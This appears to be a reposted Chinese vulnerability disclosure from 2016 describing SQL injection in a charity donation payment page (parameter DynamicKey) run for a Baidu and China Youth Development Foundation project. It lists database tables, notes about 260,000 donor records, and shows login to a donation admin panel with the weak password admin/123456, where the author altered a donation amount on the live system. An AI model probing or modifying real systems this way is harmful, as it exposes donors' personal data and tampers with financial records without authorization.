HanDs
NO.2

[7月漏洞公开] 从百度智能微校新项目到拿下中国青少年基金系统(可篡改捐款金额) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

上个厕所的功夫,看到这个广告,来测试了一下

详细说明:

code 区域
为响应李克强总理“十年内解决村小硬件问题”和“互联网+”的号召,切实解决贫困地区教学基础设施的现实问题,百度携手希望工程及中国青少年发展基金会,引入物联网技术,开创“互联网+公益”全新模式联合五位顶尖建筑设计师,一同走进广西壮族自治区和的5个偏远山区贫困小学,共启“5元新校舍”公益活动,为这里的孩子建设低成本智能化新校舍,建成真正以学生学校实际需求为导向的智能希望小学。





1.png





这个项目不错,是个福利,使用我的工具找到一处注入,





code 区域
GET /netpay/Bankpayment.aspx?DynamicKey=dba9a062-ed84-406e-a383-d4745bc41e3a&OrderNo=W1605270637&ExpTime=-1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Connection: close
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Host: **.**.**.**
Pragma: no-cache







code 区域
注入参数#DynamicKey





code 区域
OnSetStateFailLog
PCharitableProject
PCharitableProject
PManageUser
PMapItems
PayOrder
Pro_ProjectItem
Pro_ProjectItem
Pro_Types
Puserinfo
Sfa_City
Sfa_Rovince
Sys_Config
Sys_Deptment
Sys_DeptmentType
Sys_Emplates
Sys_Files
Sys_Foundation
Sys_LockKey
Sys_MapItems
Sys_Maps
Sys_Module
Sys_ModuleType
Sys_Msg
Sys_NoRule
Sys_NoRuleType
Sys_Notice
Sys_OnlineUser
Sys_RolePermission
Sys_Roles
Sys_UserPermission
Sys_UserRoles
Sys_UserType
Sys_Users
Sys_tabs
V_Projects
donate_Donman
donate_OrderItems
donate_Orders
netpay_AliData
netpay_CYDFWeb
netpay_ConfigSet
netpay_EpayData
netpay_HaierPayData
netpay_TengData
netpay_WxAccount
netpay_WxQcode
netpay_ZhaoData
por_PortalModules
tb_temp1
tb_temp1
temp_1
temp_Project
temp_url
tmp_ProjectCount
vw_ProjectCount
vw_Years

漏洞证明:

1.png





看到了一个365,估计是办公系统的库,这个暂且不管,先看本库,有2014年至2016年的全部捐款信息,权限DBA,可垮裤查询



1.png





有支付订单的痕迹



共26W+捐款人信息



code 区域
"AuditDate","datetime"
"ExpTime","int"
"FeeRateType","int"
"IsSendDon","int"
"IsSendReqWeb","int"
"Note","varchar"
"NoticeUrl","varchar"
"PayCharitable","varchar
"PayDate","datetime"
"PayID","varchar"
"Payment","int"
"PayMoney","numeric"
"PayOrder","varchar"
"PayPayee","varchar"
"PayState","int"
"PayType","varchar"
"PayUser","varchar"
"ProCode","varchar"
"QualeID","int"
"RequestUrl","varchar"
"ShowUrl","varchar"





找找C段,得到几个系统



第一个微信捐款系统

code 区域
http://**.**.**.**/login/index





存在弱口令问题

code 区域
admin/123456



1.png





在下面可修改捐款金额,可怕

1.png





1.png





打开微信公众号看下

1.png



1.png





是没有限制捐款额度的

1.png





我这里修改定额为1000,页面效果

1.png





code 区域
注:为了证明危害修改了一下,目前已修改回来





其它系统,就不用测试,这个SQL注射数据库高权限,可以把所有的库给拖下来了,包括捐款人绑定的电话号码,地址,姓名等数据



不深入了

修复方案:

过滤

弱口令问题


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
从百俣 戎悄芪 康侥孟
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组